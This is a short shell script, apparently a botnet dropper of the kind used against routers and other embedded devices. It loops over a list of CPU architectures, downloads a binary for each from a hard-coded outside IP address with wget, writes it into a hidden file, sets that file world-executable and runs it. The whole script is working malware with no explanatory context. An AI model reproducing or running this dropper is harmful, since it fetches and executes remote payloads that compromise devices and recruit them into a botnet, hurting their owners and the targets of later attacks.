#!/bin/sh
u=".z"
bin_names="arm7 arm mips mipsel powerpc m68k sh4 sparc  i686"
http_server="62.4.16.8"
for name in $bin_names
    do
    rm -rf $u
    cp $SHELL $u
    chmod 777 $u
    >$u
    wget http://$http_server/$name -O -> $u
    ./$u ssh.$name
done
